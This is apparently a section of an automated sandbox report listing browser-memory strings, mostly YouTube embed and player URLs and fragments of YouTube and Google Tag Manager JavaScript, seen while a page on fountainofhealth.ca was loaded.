Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484765709.000028EC03728000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX286FD"} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXM$ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXdator equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXer( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXler equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2499781921.000028EC06410000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXlerdler equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXr equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws*! equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws.Other equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsatorr equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsdator equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsdler7 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR31UEST equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRc); equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488324966.000028EC03C88000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/generate_204?cDRRTQ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/generate_204?oFXXFw equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/generate_204?xfMLzA equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/kmbjdnl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485391480.000028EC037F0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=FURi5aHgp1g equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=FURi5aHgp1g&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2360579493.000028EC07D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2507031147.000028EC07D2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=h15NcT6UXh0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2477065852.000028EC02EE0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comh.ca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comh.capagepfabeoofebfddakdcjhd) anonymous] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https_www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2502516412.000028EC06DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497527553.000028EC04D50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https_www.youtube.com_0@1YtIdbMeta equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https_www.youtube.com_0@1 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}EB equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: if(!(f||g||h||m.length||n.length))return;var q={Yi:f,Wi:g,Xi:h,Gj:m,Hj:n,Pf:p,bc:e},r=l.YT;if(r)return r.ready&&r.ready(d),e;var t=l.onYouTubeIframeAPIReady;l.onYouTubeIframeAPIReady=function(){t&&t();d()};A(function(){for(var u=y.getElementsByTagName("script"),v=u.length,w=0;w<v;w++){var x=u[w].getAttribute("src");if(RI(x,"iframe_api")||RI(x,"player_api"))return e}for(var z=y.getElementsByTagName("iframe"),C=z.length,D=0;D<C;D++)if(!II&&PI(z[D],q.Pf))return vc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: iginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: is.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: var M6={};var HF7={X2:[{RD:/Unable to load player module/,weight:20},{RD:/Failed to fetch/,weight:500},{RD:/XHR API fetch failed/,weight:10},{RD:/JSON parsing failed after XHR fetch/,weight:10},{RD:/Retrying OnePlatform request/,weight:10},{RD:/CSN Missing or undefined during playback association/,weight:100},{RD:/Non-recoverable error. Do not retry./,weight:0},{RD:/Internal Error. Retry with an exponential backoff./,weight:0},{RD:/API disabled by application./,weight:0}],Zz:[{callback:GDP,weight:500}]};var Pfr=/[&\?]action_proxy=1/,$el=/[&\?]token=([\w-]*)/,xeX=/[&\?]video_id=([\w-]*)/,vFY=/[&\?]index=([\d-]*)/,DeP=/[&\?]m_pos_ms=([\d-]*)/,KYd=/[&\?]vvt=([\w-]*)/,Uez="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),kDB="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),QdB={android:"ANDROID", equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: var TH=function(a,b,c,d,e){var f=RE("fsl",c?"nv.mwt":"mwt",0),g;g=c?RE("fsl","nv.ids",[]):RE("fsl","ids",[]);if(!g.length)return!0;var h=WE(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);O(121);if(m==="https://www.facebook.com/tr/")return O(122),!0;h["gtm.elementUrl"]=m;h["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!nD(h,pD(b, equals www.facebook.com (Facebook)
Source: powershell.exe, 00000022.00000002.1908768239.0000028FCF1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF263000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com=1 equals www.linkedin.com (Linkedin)
Source: chrome.exe, 00000000.00000002.2502048114.000028EC06D54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2476559206.000028EC02E3C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com(N equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2498572805.000028EC05C20000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491141569.000028EC04034000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2476559206.000028EC02E3C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467230860.000028EC0223C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com@Z equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comED equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489024413.000028EC03E2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485567217.000028EC03804000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comL equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comd.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470845062.000028EC026BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.come.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2480846916.000028EC03334000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.commcaontent-producer.web.app equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comofpalmlakkmbjdnl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2467230860.000028EC0223C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comq equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2343629747.000028EC062AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323044133.000028EC04024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com|@G equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: xmlhttprequest>6https://www.youtube.com/youtubei/v1/log_event?alt=json7 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: yOb=function(B,z){if(!B.T["0"]){var T=new N_("0","fakesb",{video:new uF(0,0,0,void 0,void 0,"auto")});B.T["0"]=z?new XU(new g.QP("http://www.youtube.com/videoplayback"),T,"fake"):new Lj(new g.QP("http://www.youtube.com/videoplayback"),T,new PL(0,0),new PL(0,0))}}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: yt3.ggpht.comtionFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: z.customBaseYoutubeUrl:B.BASE_YT_URL)||"")||lYK(this.yl)||this.protocol+"://www.youtube.com/";b=z?z.eventLabel:B.el;R="detailpage";b==="adunit"?R=this.W?"embedded":"detailpage":b==="embedded"||this.J?R=b9(R,b,L6Y):b&&(R="embedded");this.XE=R;PAY();b=null;R=z?z.playerStyle:B.ps;W=g.F5(CiP,R);!R||W&&!this.J||(b=R);this.playerStyle=b;this.X=g.F5(CiP,this.playerStyle);this.houseBrandUserStatus=z==null?void 0:z.houseBrandUserStatus;this.UE=this.X&&this.playerStyle!=="play"&&this.playerStyle!=="jamboard"; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: z=this.api.K();B=this.api.getVideoData();var T="";z.Y||(z=g.Of(z),z.indexOf("www.")===0&&(z=z.substring(4)),T=g.ev(B)?"Watch on YouTube Music":z==="youtube.com"?"Watch on YouTube":g.Ix("Watch on $WEBSITE",{WEBSITE:z}));this.updateValue("title",T)}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}[] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}mic":false} equals www.youtube.com (Youtube)
